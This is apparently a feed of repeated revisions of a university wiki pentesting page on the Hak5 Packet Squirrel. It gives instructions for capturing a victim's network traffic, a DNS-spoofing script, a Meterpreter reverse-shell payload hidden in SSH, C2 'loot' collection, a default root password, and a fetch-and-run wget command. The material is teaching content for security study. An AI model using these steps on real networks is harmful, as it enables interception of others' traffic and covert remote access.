&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6078</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6078"/>
		<updated>2021-03-02T15:29:29Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* LED Definitions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6077</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6077"/>
		<updated>2021-03-02T14:52:08Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added Meterpreter-via-SSH payload&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
